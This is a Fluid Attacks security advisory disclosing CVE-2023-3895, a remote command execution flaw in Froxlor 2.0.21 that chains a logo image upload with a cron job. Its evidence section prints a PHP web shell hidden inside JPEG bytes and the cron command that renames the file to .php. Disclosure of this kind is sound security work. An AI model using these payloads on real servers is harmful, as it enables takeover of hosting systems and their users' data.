---
slug: advisories/radiohead/
title: Froxlor 2.0.21 - Remote Command Execution
authors: Ronald Hernandez
writer: rhernandez
codename: radiohead
product: Froxlor 2.0.21 - Remote Command Execution
date: 2023-08-11 12:00 COT
cveid: CVE-2023-3895
severity: 8.0
description: Froxlor 2.0.21      -     Remote Command Execution
keywords: Fluid Attacks, Security, Vulnerabilities, RCE, Froxlor, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Froxlor 2.0.21 - Remote Command Execution"
    code="[Radiohead](https://es.wikipedia.org/wiki/Radiohead)"
    product="Froxlor 2.0.21"
    affected-versions="Version 2.0.21"
    fixed-versions=""
    state="Private"
    release="2023-08-11">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Remote Command Execution"
    rule="[004. Remote command execution](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-004/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C"
    score="8.0"
    available="Yes"
    id="[CVE-2023-3895](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3895)">
</vulnerability-table>

## Description

Froxlor allows an user to execute commands on the server
by abusing the built-in image upload and cron jobs
functionality.

## Vulnerability

Remote Command Execution (RCE) vulnerability has been
identified in Froxlor, is possible to upload images
profiles without properly validating the type and
content, the application also allows creating cron jobs
without proper validation of dangerous commands, these
two flaws lead to remote code execution.

![Untitled](https://user-images.githubusercontent.com/87587286/255379023-0e818858-1802-4969-b807-b4b3106d4f47.gif)

## Exploitation

Will be available soon.

## Evidence of exploitation

In the Portal of Froxlor , we need to go to System ->
Settings -> Panel Settings and Upload a Logo Image,
then with have to add our payload in the image content:

```text
ÿØÿà<?php echo exec($_GET['cmd']); ?>ÿÛ
```

![upload](https://user-images.githubusercontent.com/87587286/255379485-25fc881f-6149-4e7f-8f87-125ca5a3be42.png)

after that, we need get the image name, and go to System
-> Cronjob settings and add our payload:

```text
/usr/bin/nice -n 5 mv /var/www/html/froxlor/img/here-the-image-name.jpeg  /var/www/html/froxlor/img/a.php |
```

![cron](https://user-images.githubusercontent.com/87587286/255379526-ef6c67dd-cbd5-4b08-985b-b6f7dde04e2e.png)

finally, we need to wait for cron job task execute the mv
commad that change the image to php extension and this allow
to execute command in the server

![cmd1](https://user-images.githubusercontent.com/87587286/255379539-c27584cb-705e-4ba5-acea-2b66a72e271b.png)

## Our security policy

We have reserved the ID CVE-2023-3895 to refer to this issue
from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Froxlor 2.0.21

* Operating System: Linux

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Ronald Hernandez](https://www.linkedin.com/in/ronald91)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://github.com/Froxlor/Froxlor>

## Timeline

<time-lapse
  discovered="2023-07-24"
  contacted="2023-07-24"
  replied="2023-07-25"
  confirmed="2023-07-25"
  patched=""
  disclosure="2023-08-11">
</time-lapse>
